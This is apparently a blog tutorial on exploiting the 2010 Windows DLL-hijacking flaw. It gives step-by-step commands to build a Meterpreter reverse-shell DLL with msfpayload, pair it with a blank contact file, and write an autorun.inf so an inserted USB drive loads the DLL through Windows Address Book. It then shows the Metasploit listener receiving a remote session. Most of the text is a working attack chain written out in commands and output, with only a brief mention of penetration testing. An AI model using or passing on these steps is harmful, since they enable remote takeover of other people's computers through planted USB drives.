Exploit DLL Vulnerability with Autorun and Metasploit on Windows
Introduction
So by now, you guys have probably all heard of the Windows DLL exploit vulnerability that's been found recently, right? If not, please read this post: http://greyhat-security.com/40-220-windows-exes-vulnerable-remote-code-e...
Basically, what's going to happen in this tutorial, is you're going to use Metasploit to generate a reverse_tcp payload into a DLL, and you're also going to create a blank "VCF" file, which is a Windows Address Book contact file. We're then going to create an autorun.inf file which gets the USB drive/CD Drive to tell WAB to open the blank VCF, and when it does so, it will automatically load the DLL file as well (the malicious one you generate beforehand). So let's get to it, hey?
The Good Stuff
Alright, so head on over to your box - I'm going to assume you've installed Metasploit, but if not, please do that first. Then, we need to generate the actual payload:
root@box:~$ msfpayload windows/meterpreter/reverse_tcp LHOST=110.232.114.34 LPORT=4444 D > ./twain.dll
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=110.232.114.34,LPORT=4444
Next, you need to create a blank VCF file. You should already know how to do this, as it's relatively easy, but if not, type this in your Linux command line:
root@box:~$ touch Organisation_Address_Book.vcf
This will create the file "Organisation Address Book.vcf" with no contents (the \'s are so that the Linux command line doesn't treat the spaces as separate files, but instead, treats them as actual spaces in the one file.
Bring those two files over to your flash drive by whatever means you find necessary (SCP, RSYNC, copy and paste, etc), then create an "autorun.inf" file in the root of the flash drive, which has the following contents:
[AutoRun]
OPEN=”C:\Program Files\Outlook Express\wab.exe” Organisation_Address_Book.vcf
ACTION=Add Contacts to Address Book
LABEL=Address Book
ICON="C:\Program Files\Outlook Express\wab.exe"
Then, set up your Metasploit to listen for it. So, in msfconsole:
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 584 exploits - 297 auxiliary
+ -- --=[ 219 payloads - 27 encoders - 8 nops
=[ svn r10162 updated today (2010.08.26)
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST <YOUR_IP>
LHOST => <YOUR_IP>
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse handler on <YOUR_IP>:4444
[*] Starting the payload handler...
And you'll see that happen, then insert your flash drive, and double click on the Address Book option, and you should see the following:
[*] Sending stage (748544 bytes) to <TARGET_IP>
[*] Meterpreter session 1 opened (<YOUR_IP>:4444 -> <TARGET_IP>:30107) at <DATE> <TIME> <TIMEZONE>
Then, the world is your Oyster!
The Conclusion
So, as you can see, there's quite a great many possibilities from this recent DLL exploit discovery. So many applications are vulnerable, form uTorrent to Thunderbird, to IE, etc. It's infinite (theoretically), and can be used quite successfully in penetration tests for a time to come. Enjoy!